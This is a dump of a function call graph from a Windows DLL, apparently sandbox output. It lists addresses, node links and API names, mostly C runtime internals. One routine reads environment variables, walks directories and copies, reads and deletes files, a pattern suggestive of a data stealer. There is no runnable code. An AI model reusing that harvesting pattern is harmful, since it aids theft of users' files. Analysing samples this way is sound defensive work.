221672af 7510->7511 7511->7509 7512 221672dd GetFileType 7511->7512 7512->7511 7514 22167326 7513->7514 7515 22167369 GetStdHandle 7514->7515 7516 221673d1 7514->7516 7517 2216737c GetFileType 7514->7517 7515->7514 7516->7505 7517->7514 7521 221656b9 RtlLeaveCriticalSection 7518->7521 7520 22167429 7520->7503 7521->7520 7522 221636d0 7523 221636e2 7522->7523 7525 221636f0 @_EH4_CallFilterFunc@8 7522->7525 7524 22162ada _ValidateLocalCookies 5 API calls 7523->7524 7524->7525 6464 22165351 6465 22165360 6464->6465 6469 22165374 6464->6469 6467 2216571e _free 20 API calls 6465->6467 6465->6469 6466 2216571e _free 20 API calls 6468 22165386 6466->6468 6467->6469 6470 2216571e _free 20 API calls 6468->6470 6469->6466 6471 22165399 6470->6471 6472 2216571e _free 20 API calls 6471->6472 6473 221653aa 6472->6473 6474 2216571e _free 20 API calls 6473->6474 6475 221653bb 6474->6475 7526 22164bdd 7527 22164bec 7526->7527 7528 22164c08 7526->7528 7527->7528 7529 22164bf2 7527->7529 7530 22166d60 51 API calls 7528->7530 7531 22166368 __dosmaperr 20 API calls 7529->7531 7532 22164c0f GetModuleFileNameA 7530->7532 7533 22164bf7 7531->7533 7534 22164c33 7532->7534 7535 221662ac _abort 26 API calls 7533->7535 7549 22164d01 7534->7549 7536 22164c01 7535->7536 7541 22164c66 7543 22166368 __dosmaperr 20 API calls 7541->7543 7542 22164c72 7544 22164d01 38 API calls 7542->7544 7545 22164c6b 7543->7545 7546 22164c88 7544->7546 7547 2216571e _free 20 API calls 7545->7547 7546->7545 7548 2216571e _free 20 API calls 7546->7548 7547->7536 7548->7545 7551 22164d26 7549->7551 7553 22164d86 7551->7553 7561 221670eb 7551->7561 7552 22164c50 7555 22164e76 7552->7555 7553->7552 7554 221670eb 38 API calls 7553->7554 7554->7553 7556 22164c5d 7555->7556 7557 22164e8b 7555->7557 7556->7541 7556->7542 7557->7556 7558 2216637b _abort 20 API calls 7557->7558 7559 22164eb9 7558->7559 7560 2216571e _free 20 API calls 7559->7560 7560->7556 7564 22167092 7561->7564 7565 221654a7 __fassign 38 API calls 7564->7565 7566 221670a6 7565->7566 7566->7551 5810 22161c5b 5811 22161c6b ___scrt_fastfail 5810->5811 5814 221612ee 5811->5814 5813 22161c87 5815 22161324 ___scrt_fastfail 5814->5815 5816 221613b7 GetEnvironmentVariableW 5815->5816 5840 221610f1 5816->5840 5819 221610f1 57 API calls 5820 22161465 5819->5820 5821 221610f1 57 API calls 5820->5821 5822 22161479 5821->5822 5823 221610f1 57 API calls 5822->5823 5824 2216148d 5823->5824 5825 221610f1 57 API calls 5824->5825 5826 221614a1 5825->5826 5827 221610f1 57 API calls 5826->5827 5828 221614b5 lstrlenW 5827->5828 5829 221614d2 5828->5829 5830 221614d9 lstrlenW 5828->5830 5829->5813 5831 221610f1 57 API calls 5830->5831 5832 22161501 lstrlenW lstrcatW 5831->5832 5833 221610f1 57 API calls 5832->5833 5834 22161539 lstrlenW lstrcatW 5833->5834 5835 221610f1 57 API calls 5834->5835 5836 2216156b lstrlenW lstrcatW 5835->5836 5837 221610f1 57 API calls 5836->5837 5838 2216159d lstrlenW lstrcatW 5837->5838 5839 221610f1 57 API calls 5838->5839 5839->5829 5841 22161118 ___scrt_fastfail 5840->5841 5842 22161129 lstrlenW 5841->5842 5853 22162c40 5842->5853 5845 22161177 lstrlenW FindFirstFileW 5847 221611a0 5845->5847 5848 221611e1 5845->5848 5846 22161168 lstrlenW 5846->5845 5849 221611c7 FindNextFileW 5847->5849 5850 221611aa 5847->5850 5848->5819 5849->5847 5852 221611da FindClose 5849->5852 5850->5849 5855 22161000 5850->5855 5852->5848 5854 22161148 lstrcatW lstrlenW 5853->5854 5854->5845 5854->5846 5856 22161022 ___scrt_fastfail 5855->5856 5857 221610af 5856->5857 5858 2216102f lstrcatW lstrlenW 5856->5858 5859 221610b5 lstrlenW 5857->5859 5870 221610ad 5857->5870 5860 2216105a lstrlenW 5858->5860 5861 2216106b lstrlenW 5858->5861 5886 22161e16 5859->5886 5860->5861 5872 22161e89 lstrlenW 5861->5872 5864 221610ca 5867 22161e89 5 API calls 5864->5867 5864->5870 5865 22161088 GetFileAttributesW 5866 2216109c 5865->5866 5865->5870 5866->5870 5878 2216173a 5866->5878 5869 221610df 5867->5869 5891 221611ea 5869->5891 5870->5850 5873 22162c40 ___scrt_fastfail 5872->5873 5874 22161ea7 lstrcatW lstrlenW 5873->5874 5875 22161ec2 5874->5875 5876 22161ed1 lstrcatW 5874->5876 5875->5876 5877 22161ec7 lstrlenW 5875->5877 5876->5865 5877->5876 5879 22161747 ___scrt_fastfail 5878->5879 5906 22161cca 5879->5906 5883 2216199f 5883->5870 5884 22161824 ___scrt_fastfail _strlen 5884->5883 5926 221615da 5884->5926 5887 22161e29 5886->5887 5890 22161e4c 5886->5890 5888 22161e2d lstrlenW 5887->5888 5887->5890 5889 22161e3f lstrlenW 5888->5889 5888->5890 5889->5890 5890->5864 5892 2216120e ___scrt_fastfail 5891->5892 5893 22161e89 5 API calls 5892->5893 5894 22161220 GetFileAttributesW 5893->5894 5895 22161246 5894->5895 5896 22161235 5894->5896 5897 22161e89 5 API calls 5895->5897 5896->5895 5898 2216173a 35 API calls 5896->5898 5899 22161258 5897->5899 5898->5895 5900 221610f1 56 API calls 5899->5900 5901 2216126d 5900->5901 5902 22161e89 5 API calls 5901->5902 5903 2216127f ___scrt_fastfail 5902->5903 5904 221610f1 56 API calls 5903->5904 5905 221612e6 5904->5905 5905->5870 5907 22161cf1 ___scrt_fastfail 5906->5907 5908 22161d0f CopyFileW CreateFileW 5907->5908 5909 22161d44 DeleteFileW 5908->5909 5910 22161d55 GetFileSize 5908->5910 5915 22161808 5909->5915 5911 22161ede 22 API calls 5910->5911 5912 22161d66 ReadFile 5911->5912 5913 22161d94 CloseHandle DeleteFileW 5912->5913 5914 22161d7d CloseHandle DeleteFileW 5912->5914 5913->5915 5914->5915 5915->5883 5916 22161ede 5915->5916 5917 2216222f 5916->5917 5919 2216224e 5917->5919 5922 22162250 5917->5922 5934 2216474f 5917->5934 5939 221647e5 5917->5939 5919->5884 5921 22162908 5923 221635d2 __CxxThrowException@8 RaiseException 5921->5923 5922->5921 5946 221635d2 5922->5946 5925 22162925 5923->5925 5925->5884 5927 2216160c _strcat _strlen 5926->5927 5928 2216163c lstrlenW 5927->5928 6034 22161c9d 5928->6034 5930 22161655 lstrcatW lstrlenW 5931 22161678 5930->5931 5932 2216167e lstrcatW 5931->5932 5933 22161693 ___scrt_fastfail 5931->5933 5932->5933 5933->5884 5949 22164793 5934->5949 5936 22164765 5955 22162ada 5936->5955 5938 2216478f 5938->5917 5944 221656d0 _abort 5939->5944 5940 2216570e 5968 22166368 5940->5968 5942 221656f9 RtlAllocateHeap 5943 2216570c 5942->5943 5942->5944 5943->5917 5944->5940 5944->5942 5945 2216474f _abort 7 API calls 5944->5945 5945->5944 5948 221635f2 RaiseException 5946->5948 5948->5921 5950 2216479f ___scrt_is_nonwritable_in_current_image 5949->5950 5962 22165671 RtlEnterCriticalSection 5950->5962 5952 221647aa 5963 221647dc 5952->5963 5954 221647d1 _abort 5954->5936 5956 22162ae5 IsProcessorFeaturePresent 5955->5956 5957 22162ae3 5955->5957 5959 22162b58 5956->5959 5957->5938 5967 22162b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5959->5967 5961 22162c3b 5961->5938 5962->5952 5966 221656b9 RtlLeaveCriticalSection 5963->5966 5965 221647e3 5965->5954 5966->5965 5967->5961 5971 22165b7a GetLastError 5968->5971 5972 22165b93 5971->5972 5973 22165b99 5971->5973 5990 22165e08 5972->5990 5976 22165bf0 SetLastError 5973->5976 5997 2216637b 5973->5997 5980 22165bf9 5976->5980 5977 22165bb3 6004 2216571e 5977->6004 5980->5943 5983 22165bb9 5985 22165be7 SetLastError 5983->5985 5984 22165bcf 6017 2216593c 5984->6017 5985->5980 5988 2216571e _free 17 API calls 5989 22165be0 5988->5989 5989->5976 5989->5985 6022 22165c45 5990->6022 5992 22165e2f 5993 22165e47 TlsGetValue 5992->5993 5996 22165e3b 5992->5996 5993->5996 5994 22162ada _ValidateLocalCookies 5 API calls 5995 22165e58 5994->5995 5995->5973 5996->5994 6002 22166388 _abort 5997->6002 5998 221663b3 RtlAllocateHeap 6000 22165bab 5998->6000 5998->6002 5999 221663c8 6001 22166368 __dosmaperr 19 API calls 5999->6001 6000->5977 6010 22165e5e 6000->6010 6001->6000 6002->5998 6002->5999 6003 2216474f _abort 7 API calls 6002->6003 6003->6002 6005 22165752 __dosmaperr 6004->6005 6006 22165729 HeapFree 6004->6006 6005->5983 6006->6005 6007 2216573e 6006->6007 6008 22166368 __dosmaperr 18 API calls 6007->6008 6009 22165744 GetLastError 6008->6009 6009->6005 6011 22165c45 _abort 5 API calls 6010->6011 6012 22165e85 6011->6012 6013 22165ea0 TlsSetValue 6012->6013 6014 22165e94 6012->6014 6013->6014 6015 22162ada _ValidateLocalCookies 5 API calls 6014->6015 6016 22165bc8 6015->6016 6016->5977 6016->5984 6028 22165914 6017->6028 6026 22165c71 6022->6026 6027 22165c75 __crt_fast_encode_pointer 6022->6027 6023 22165c95 6025 22165ca1 GetProcAddress 6023->6025 6023->6027 6024 22165ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6024->6026 6025->6027 6026->6023 6026->6024 6026->6027 6027->5992 6029 22165854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6028->6029 6030 22165938 6029->6030 6031 221658c4 6030->6031 6032 22165758 _abort 20 API calls 6031->6032 6033 221658e8 6032->6033 6033->5988 6035 22161ca6 _strlen 6034->6035 6035->5930 7567 221620db 7568 221620e7 ___scrt_is_nonwritable_in_current_image 7567->7568 7569 22162110 dllmain_raw 7568->7569 7573 2216210b 7568->7573 7579 221620f6 7568->7579 7570 2216212a 7569->7570 7569->7579 7580 22161eec 7570->7580 7572 22162177 7574 22161eec 31 API calls 7572->7574 7572->7579 7573->7572 7576 22161eec 31 API calls 7573->7576 7573->7579 7575 2216218a 7574->7575 7577 22162193 dllmain_raw 7575->7577 7575->7579 7578 2216216d dllmain_raw 7576->7578 7577->7579 7578->7572 7581 22161ef7 7580->7581 7582 22161f2a dllmain_crt_process_detach 7580->7582 7583 22161f1c dllmain_crt_process_attach 7581->7583 7584 22161efc 7581->7584 7586 22161f06 7582->7586 7583->7586 7585 22161f12 7584->7585 7587 22161f01 7584->7587 7595 221623ec 7585->7595 7586->7573 7587->7586 7590 2216240b 7587->7590 7603 221653e5 7590->7603 7696 22163513 7595->7696 7597 221623f5 7597->7586 7601 22162408 7601->7586 7602 2216351e 7 API calls 7602->7597 7609 22165aca 7603->7609 7606 2216351e 7685 22163820 7606->7685 7608 22162415 7608->7586 7610 22165ad4 7609->7610 7611 22162410 7609->7611 7612 22165e08 _abort 11 API calls 7610->7612 7611->7606 7613 22165adb 7612->7613 7613->7611 7614 22165e5e _abort 11 API calls 7613->7614 7615 22165aee 7614->7615 7617 221659b5 7615->7617 7618 221659d0 7617->7618 7619 221659c0 7617->7619 7618->7611 7623 221659d6 7619->7623 7622 2216571e _free 20 API calls 7622->7618 7624 221659ef 7623->7624 7625 221659e9 7623->7625 7627 2216571e _free 20 API calls 7624->7627 7626 2216571e _free 20 API calls 7625->7626 7626->7624 7628 221659fb 7627->7628 7629 2216571e _free 20 API calls 7628->7629 7630 22165a06 7629->7630 7631 2216571e _free 20 API calls 7630->7631 7632 22165a11 7631->7632 7633 2216571e _free 20 API calls 7632->7633 7634 22165a1c 7633->7634 7635 2216571e _free 20 API calls 7634->7635 7636 22165a27 7635->7636 7637 2216571e _free 20 API calls 7636->7637 7638 22165a32 7637->7638 7639 2216571e _free 20 API calls 7638->7639 7640 22165a3d 7639->7640 7641 2216571e _free 20 API calls 7640->7641 7642 22165a48 7641->7642 7643 2216571e _free 20 API calls 7642->7643 7644 22165a56 7643->7644 7649 2216589c 7644->7649 7655 221657a8 7649->7655 7651 221658c0 7652 221658ec 7651->7652 7668 22165809 7652->7668 7654 22165910 7654->7622 7656 221657b4 ___scrt_is_nonwritable_in_current_image 7655->7656 7663 22165671 RtlEnterCriticalSection 7656->7663 7658 221657e8 7664 221657fd 7658->7664 7659 221657be 7659->7658 7662 2216571e _free 20 API calls 7659->7662 7661 221657f5 _abort 7661->7651 7662->7658 7663->7659 7667 221656b9 RtlLeaveCriticalSection 7664->7667 7666 22165807 7666->7661 7667->7666 7669 22165815 ___scrt_is_nonwritable_in_current_image 7668->7669 7676 22165671 RtlEnterCriticalSection 7669->7676 7671 2216581f 7677 22165a7f 7671->7677 7673 22165832 7681 22165848 7673->7681 7675 22165840 _abort 7675->7654 7676->7671 7678 22165ab5 __fassign 7677->7678 7679 22165a8e __fassign 7677->7679 7678->7673 7679->7678 7680 22167cc2 __fassign 20 API calls 7679->7680 7680->7678 7684 221656b9 RtlLeaveCriticalSection 7681->7684 7683 22165852 7683->7675 7684->7683 7686 2216382d 7685->7686 7690 2216384b ___vcrt_freefls@4 7685->7690 7687 2216383b 7686->7687 7691 22163b67 7686->7691 7689 22163ba2 ___vcrt_FlsSetValue 6 API calls 7687->7689 7689->7690 7690->7608 7692 22163a82 try_get_function 5 API calls 7691->7692 7693 22163b81 7692->7693 7694 22163b99 TlsGetValue 7693->7694 7695 22163b8d 7693->7695 7694->7695 7695->7687 7702 22163856 7696->7702 7698 221623f1 7698->7597 7699 221653da 7698->7699 7700 22165b7a _abort 20 API calls 7699->7700 7701 221623fd 7700->7701 7701->7601 7701->7602 7703 22163862 GetLastError 7702->7703 7704 2216385f 7702->7704 7705 22163b67 ___vcrt_FlsGetValue 6 API calls 7703->7705 7704->7698 7706 22163877 7705->7706 7707 221638dc SetLastError 7706->7707 7708 22163ba2 ___vcrt_FlsSetValue 6 API calls 7706->7708 7713 22163896 7706->7713 7707->7698 7709 22163890 7708->7709 7710 221638b8 7709->7710 7711 22163ba2 ___vcrt_FlsSetValue 6 API calls 7709->7711 7709->7713 7712 22163ba2 ___vcrt_FlsSetValue 6 API calls 7710->7712 7710->7713 7711->7710 7712->7713 7713->7707 7714 2216a1c6 IsProcessorFeaturePresent 7715 22167bc7 7716 22167bd3 ___scrt_is_nonwritable_in_current_image 7715->7716 7717 22167c0a _abort 7716->7717 7723 22165671 RtlEnterCriticalSection 7716->7723 7719 22167be7 7720 22167f86 __fassign 20 API calls 7719->7720 7721 22167bf7 7720->7721 7724 22167c10 7721->7724 7723->7719 7727 221656b9 RtlLeaveCriticalSection 7724->7727 7726 22167c17 7726->7717 7727->7726 6476 2216a945 6478 2216a96d 6476->6478 6477 2216a9a5 6478->6477 6479 2216a997 6478->6479 6480 2216a99e 6478->6480 6485 2216aa17 6479->6485 6489 2216aa00 6480->6489 6486 2216aa20 6485->6486 6493 2216b19b 6486->6493 6490 2216aa20 6489->6490 6491 2216b19b __startOneArgErrorHandling 21 API calls 6490->6491 6492 2216a9a3 6491->6492 6495 2216b1da __startOneArgErrorHandling 6493->6495 6494 2216b25c __startOneArgErrorHandling 6501 2216b286 6494->6501 6506 221678a3 6494->6506 6495->6494 6503 2216b59e 6495->6503 6498 2216b292 6500 22162ada _ValidateLocalCookies 5 API calls 6498->6500 6502 2216a99c 6500->6502 6501->6498 6510 2216b8b2 6501->6510 6517 2216b5c1 6503->6517 6507 221678cb 6506->6507 6508 22162ada _ValidateLocalCookies 5 API calls 6507->6508 6509 221678e8 6508->6509 6509->6501 6511 2216b8d4 6510->6511 6512 2216b8bf 6510->6512 6514 22166368 __dosmaperr 20 API calls 6511->6514 6513 2216b8d9 6512->6513 6515 22166368 __dosmaperr 20 API calls 6512->6515 6513->6498 6514->6513 6516 2216b8cc 6515->6516 6516->6498 6518 2216b5ec __raise_exc 6517->6518 6519 2216b7e5 RaiseException 6518->6519 6520 2216b5bc 6519->6520 6520->6494 6521 2216af43 6522 2216af4d 6521->6522 6523 2216af59 6521->6523 6522->6523 6524 2216af52 CloseHandle 6522->6524 6524->6523 6525 22168640 6528 22168657 6525->6528 6529 22168665 6528->6529 6530 22168679 6528->6530 6531 22166368 __dosmaperr 20 API calls 6529->6531 6532 22168681 6530->6532 6535 22168693 6530->6535 6533 2216866a 6531->6533 6534 22166368 __dosmaperr 20 API calls 6532->6534 6536 221662ac _abort 26 API calls 6533->6536 6537 22168686 6534->6537 6540 22168652 6535->6540 6541 221654a7 6535->6541 6536->6540 6539 221662ac _abort 26 API calls 6537->6539 6539->6540 6542 221654c4 6541->6542 6548 221654ba 6541->6548 6543 22165af6 _abort 38 API calls 6542->6543 6542->6548 6544 221654e5 6543->6544 6549 22167a00 6544->6549 6548->6540 6550 22167a13 6549->6550 6551 221654fe 6549->6551 6550->6551 6557 22167f0f 6550->6557 6553 22167a2d 6551->6553 6554 22167a40 6553->6554 6556 22167a55 6553->6556 6554->6556 6692 22166d7e 6554->6692 6556->6548 6558 22167f1b ___scrt_is_nonwritable_in_current_image 6557->6558 6559 22165af6 _abort 38 API calls 6558->6559 6560 22167f24 6559->6560 6564 22167f72 _abort 6560->6564 6569 22165671 RtlEnterCriticalSection 6560->6569 6562 22167f42 6570 22167f86 6562->6570 6564->6551 6568 221655a8 _abort 38 API calls 6568->6564 6569->6562 6571 22167f94 __fassign 6570->6571 6573 22167f56 6570->6573 6571->6573 6577 22167cc2 6571->6577 6574 22167f75 6573->6574 6691 221656b9 RtlLeaveCriticalSection 6574->6691 6576 22167f69 6576->6564 6576->6568 6579 22167d42 6577->6579 6580 22167cd8 6577->6580 6581 2216571e _free 20 API calls 6579->6581 6603 22167d90 6579->6603 6580->6579 6585 2216571e _free 20 API calls 6580->6585 6587 22167d0b 6580->6587 6582 22167d64 6581->6582 6583 2216571e _free 20 API calls 6582->6583 6588 22167d77 6583->6588 6584 2216571e _free 20 API calls 6589 22167d37 6584->6589 6591 22167d00 6585->6591 6586 22167d9e 6590 22167dfe 6586->6590 6604 2216571e 20 API calls _free 6586->6604 6592 2216571e _free 20 API calls 6587->6592 6602 22167d2d 6587->6602 6593 2216571e _free 20 API calls 6588->6593 6594 2216571e _free 20 API calls 6589->6594 6595 2216571e _free 20 API calls 6590->6595 6605 221690ba 6591->6605 6597 22167d22 6592->6597 6598 22167d85 6593->6598 6594->6579 6601 22167e04 6595->6601 6633 221691b8 6597->6633 6600 2216571e _free 20 API calls 6598->6600 6600->6603 6601->6573 6602->6584 6645 22167e35 6603->6645 6604->6586 6606 221690cb 6605->6606 6632 221691b4 6605->6632 6607 221690dc 6606->6607 6608 2216571e _free 20 API calls 6606->6608 6609 221690ee 6607->6609 6610 2216571e _free 20 API calls 6607->6610 6608->6607 6611 22169100 6609->6611 6612 2216571e _free 20 API calls 6609->6612 6610->6609 6613 2216571e _free 20 API calls 6611->6613 6616 22169112 6611->6616 6612->6611 6613->6616 6614 2216571e _free 20 API calls 6615 22169124 6614->6615 6617 2216571e _free 20 API calls 6615->6617 6618 22169136 6615->6618 6616->6614 6616->6615 6617->6618 6619 22169148 6618->6619 6620 2216571e _free 20 API calls 6618->6620 6621 2216915a 6619->6621 6622 2216571e _free 20 API calls 6619->6622 6620->6619 6623 2216916c 6621->6623 6624 2216571e _free 20 API calls 6621->6624 6622->6621 6625 2216917e 6623->6625 6626 2216571e _free 20 API calls 6623->6626 6624->6623 6627 22169190 6625->6627 6628 2216571e _free 20 API calls 6625->6628 6626->6625 6629 221691a2 6627->6629 6630 2216571e _free 20 API calls 6627->6630 6628->6627 6631 2216571e _free 20 API calls 6629->6631 6629->6632 6630->6629 6631->6632 6632->6587 6634 221691c5 6633->6634 6644 2216921d 6633->6644 6635 221691d5 6634->6635 6636 2216571e _free 20 API calls 6634->6636 6637 221691e7 6635->6637 6639 2216571e _free 20 API calls 6635->6639 6636->6635 6638 221691f9 6637->6638 6640 2216571e _free 20 API calls 6637->6640 6641 2216571e _free 20 API calls 6638->6641 6642 2216920b 6638->6642 6639->6637 6640->6638 6641->6642 6643 2216571e _free 20 API calls 6642->6643 6642->6644 6643->6644 6644->6602 6646 22167e42 6645->6646 6650 22167e60 6645->6650 6646->6650 6651 2216925d 6646->6651 6649 2216571e _free 20 API calls 6649->6650 6650->6586 6652 22167e5a 6651->6652 6653 2216926e 6651->6653 6652->6649 6687 22169221 6653->6687 6656 22169221 __fassign 20 API calls 6657 22169281 6656->6657 6658 22169221 __fassign 20 API calls 6657->6658 6659 2216928c 6658->6659 6660 22169221 __fassign 20 API calls 6659->6660 6661 22169297 6660->6661 6662 22169221 __fassign 20 API calls 6661->6662 6663 221692a5 6662->6663 6664 2216571e _free 20 API calls 6663->6664 6665 221692b0 6664->6665 6666 2216571e _free 20 API calls 6665->6666 6667 221692bb 6666->6667 6668 2216571e _free 20 API calls 6667->6668 6669 221692c6 6668->6669 6670 22169221 __fassign 20 API calls 6669->6670 6671 221692d4 6670->6671 6672 22169221 __fassign 20 API calls 6671->6672 6673 221692e2 6672->6673 6674 22169221 __fassign 20 API calls 6673->6674 6675 221692f3 6674->6675 6676 22169221 __fassign 20 API calls 6675->6676 6677 22169301 6676->6677 6678 22169221 __fassign 20 API calls 6677->6678 6679 2216930f 6678->6679 6680 2216571e _free 20 API calls 6679->6680 6681 2216931a 6680->6681 6682 2216571e _free 20 API calls 6681->6682 6683 22169325 6682->6683 6684 2216571e _free 20 API calls 6683->6684 6685 22169330 6684->6685 6686 2216571e _free 20 API calls 6685->6686 6686->6652 6688 22169258 6687->6688 6689 22169248 6687->6689 6688->6656 6689->6688 6690 2216571e _free 20 API calls 6689->6690 6690->6689 6691->6576 6693 22166d8a ___scrt_is_nonwritable_in_current_image 6692->6693 6694 22165af6 _abort 38 API calls 6693->6694 6695 22166d94 6694->6695 6698 221655a8 _abort 38 API calls 6695->6698 6699 22166e18 _abort 6695->6699 6700 2216571e _free 20 API calls 6695->6700 6701 22165671 RtlEnterCriticalSection 6695->6701 6702 22166e0f 6695->6702 6698->6695 6699->6556 6700->6695 6701->6695 6705 221656b9 RtlLeaveCriticalSection 6702->6705 6704 22166e16 6704->6695 6705->6704 6706 2216724e GetProcessHeap 6707 2216284f 6708 22162882 std::exception::exception 27 API calls 6707->6708 6709 2216285d 6708->6709 6710 22165348 6711 22163529 ___vcrt_uninitialize 8 API calls 6710->6711 6712 2216534f 6711->6712 6713 22167b48 6723 22168ebf 6713->6723 6717 22167b55 6736 2216907c 6717->6736 6720 22167b7f 6721 2216571e _free 20 API calls 6720->6721 6722 22167b8a 6721->6722 6740 22168ec8 6723->6740 6725 22167b50 6726 22168fdc 6725->6726 6727 22168fe8 ___scrt_is_nonwritable_in_current_image 6726->6727 6760 22165671 RtlEnterCriticalSection 6727->6760 6729 2216905e 6774 22169073 6729->6774 6730 22168ff3 6730->6729 6732 22169032 RtlDeleteCriticalSection 6730->6732 6761 2216a09c 6730->6761 6735 2216571e _free 20 API calls 6732->6735 6733 2216906a _abort 6733->6717 6735->6730 6737 22167b64 RtlDeleteCriticalSection 6736->6737 6738 22169092 6736->6738 6737->6717 6737->6720 6738->6737 6739 2216571e _free 20 API calls 6738->6739 6739->6737 6741 22168ed4 ___scrt_is_nonwritable_in_current_image 6740->6741 6750 22165671 RtlEnterCriticalSection 6741->6750 6743 22168f77 6755 22168f97 6743->6755 6747 22168f83 _abort 6747->6725 6748 22168ee3 6748->6743 6749 22168e78 66 API calls 6748->6749 6751 22167b94 RtlEnterCriticalSection 6748->6751 6752 22168f6d 6748->6752 6749->6748 6750->6748 6751->6748 6758 22167ba8 RtlLeaveCriticalSection 6752->6758 6754 22168f75 6754->6748 6759 221656b9 RtlLeaveCriticalSection 6755->6759 6757 22168f9e 6757->6747 6758->6754 6759->6757 6760->6730 6762 2216a0a8 ___scrt_is_nonwritable_in_current_image 6761->6762 6763 2216a0ce 6762->6763 6764 2216a0b9 6762->6764 6772 2216a0c9 _abort 6763->6772 6777 22167b94 RtlEnterCriticalSection 6763->6777 6765 22166368 __dosmaperr 20 API calls 6764->6765 6767 2216a0be 6765->6767 6769 221662ac _abort 26 API calls 6767->6769 6768 2216a0ea 6778 2216a026 6768->6778 6769->6772 6771 2216a0f5 6794 2216a112 6771->6794 6772->6730 7042 221656b9 RtlLeaveCriticalSection 6774->7042 6776 2216907a 6776->6733 6777->6768 6779 2216a033 6778->6779 6780 2216a048 6778->6780 6781 22166368 __dosmaperr 20 API calls 6779->6781 6792 2216a043 6780->6792 6797 22168e12 6780->6797 6782 2216a038 6781->6782 6784 221662ac _abort 26 API calls 6782->6784 6784->6792 6786 2216907c 20 API calls 6787 2216a064 6786->6787 6803 22167a5a 6787->6803 6789 2216a06a 6810 2216adce 6789->6810 6792->6771 6793 2216571e _free 20 API calls 6793->6792 7041 22167ba8 RtlLeaveCriticalSection 6794->7041 6796 2216a11a 6796->6772 6798 22168e2a 6797->6798 6802 22168e26 6797->6802 6799 22167a5a 26 API calls 6798->6799 6798->6802 6800 22168e4a 6799->6800 6825 22169a22 6800->6825 6802->6786 6804 22167a66 6803->6804 6805 22167a7b 6803->6805 6806 22166368 __dosmaperr 20 API calls 6804->6806 6805->6789 6807 22167a6b 6806->6807 6808 221662ac _abort 26 API calls 6807->6808 6809 22167a76 6808->6809 6809->6789 6811 2216adf2 6810->6811 6812 2216addd 6810->6812 6814 2216ae2d 6811->6814 6817 2216ae19 6811->6817 6813 22166355 __dosmaperr 20 API calls 6812->6813 6816 2216ade2 6813->6816 6815 22166355 __dosmaperr 20 API calls 6814->6815 6818 2216ae32 6815->6818 6819 22166368 __dosmaperr 20 API calls 6816->6819 6998 2216ada6 6817->6998 6821 22166368 __dosmaperr 20 API calls 6818->6821 6823 2216a070 6819->6823 6822 2216ae3a 6821->6822 6824 221662ac _abort 26 API calls 6822->6824 6823->6792 6823->6793 6824->6823 6826 22169a2e ___scrt_is_nonwritable_in_current_image 6825->6826 6827 22169a36 6826->6827 6831 22169a4e 6826->6831 6850 22166355 6827->6850 6829 22169aec 6832 22166355 __dosmaperr 20 API calls 6829->6832 6831->6829 6834 22169a83 6831->6834 6835 22169af1 6832->6835 6833 22166368 __dosmaperr 20 API calls 6845 22169a43 _abort 6833->6845 6853 22168c7b RtlEnterCriticalSection 6834->6853 6837 22166368 __dosmaperr 20 API calls 6835->6837 6839 22169af9 6837->6839 6838 22169a89 6840 22169aa5 6838->6840 6841 22169aba 6838->6841 6842 221662ac _abort 26 API calls 6839->6842 6844 22166368 __dosmaperr 20 API calls 6840->6844 6854 22169b0d 6841->6854 6842->6845 6847 22169aaa 6844->6847 6845->6802 6846 22169ab5 6905 22169ae4 6846->6905 6848 22166355 __dosmaperr 20 API calls 6847->6848 6848->6846 6851 22165b7a _abort 20 API calls 6850->6851 6852 2216635a 6851->6852 6852->6833 6853->6838 6855 22169b3b 6854->6855 6892 22169b34 6854->6892 6856 22169b5e 6855->6856 6857 22169b3f 6855->6857 6861 22169baf 6856->6861 6862 22169b92 6856->6862 6858 22166355 __dosmaperr 20 API calls 6857->6858 6860 22169b44 6858->6860 6859 22162ada _ValidateLocalCookies 5 API calls 6863 22169d15 6859->6863 6864 22166368 __dosmaperr 20 API calls 6860->6864 6865 22169bc5 6861->6865 6908 2216a00b 6861->6908 6866 22166355 __dosmaperr 20 API calls 6862->6866 6863->6846 6867 22169b4b 6864->6867 6911 221696b2 6865->6911 6870 22169b97 6866->6870 6872 221662ac _abort 26 API calls 6867->6872 6871 22166368 __dosmaperr 20 API calls 6870->6871 6874 22169b9f 6871->6874 6872->6892 6877 221662ac _abort 26 API calls 6874->6877 6875 22169bd3 6880 22169bd7 6875->6880 6881 22169bf9 6875->6881 6876 22169c0c 6878 22169c66 WriteFile 6876->6878 6879 22169c20 6876->6879 6877->6892 6882 22169c89 GetLastError 6878->6882 6888 22169bef 6878->6888 6884 22169c56 6879->6884 6885 22169c28 6879->6885 6886 22169ccd 6880->6886 6918 22169645 6880->6918 6923 22169492 GetConsoleCP 6881->6923 6882->6888 6949 22169728 6884->6949 6889 22169c46 6885->6889 6890 22169c2d 6885->6890 6886->6892 6893 22166368 __dosmaperr 20 API calls 6886->6893 6888->6886 6888->6892 6896 22169ca9 6888->6896 6941 221698f5 6889->6941 6890->6886 6934 22169807 6890->6934 6892->6859 6895 22169cf2 6893->6895 6898 22166355 __dosmaperr 20 API calls 6895->6898 6899 22169cc4 6896->6899 6900 22169cb0 6896->6900 6898->6892 6956 22166332 6899->6956 6901 22166368 __dosmaperr 20 API calls 6900->6901 6903 22169cb5 6901->6903 6904 22166355 __dosmaperr 20 API calls 6903->6904 6904->6892 6997 22168c9e RtlLeaveCriticalSection 6905->6997 6907 22169aea 6907->6845 6961 22169f8d 6908->6961 6983 22168dbc 6911->6983 6913 221696c2 6914 221696c7 6913->6914 6915 22165af6 _abort 38 API calls 6913->6915 6914->6875 6914->6876 6916 221696ea 6915->6916 6916->6914 6917 22169708 GetConsoleMode 6916->6917 6917->6914 6919 2216966a 6918->6919 6920 2216969f 6918->6920 6919->6920 6921 2216a181 WriteConsoleW CreateFileW 6919->6921 6922 221696a1 GetLastError 6919->6922 6920->6888 6921->6919 6922->6920 6924 221694f5 6923->6924 6928 22169607 6923->6928 6924->6928 6929 2216957b WideCharToMultiByte 6924->6929 6931 221679e6 40 API calls __fassign 6924->6931 6933 221695d2 WriteFile 6924->6933 6992 22167c19 6924->6992 6925 22162ada _ValidateLocalCookies 5 API calls 6927 22169641 6925->6927 6927->6888 6928->6925 6929->6928 6930 221695a1 WriteFile 6929->6930 6930->6924 6932 2216962a GetLastError 6930->6932 6931->6924 6932->6928 6933->6924 6933->6932 6938 22169816 6934->6938 6935 221698d8 6937 22162ada _ValidateLocalCookies 5 API calls 6935->6937 6936 22169894 WriteFile 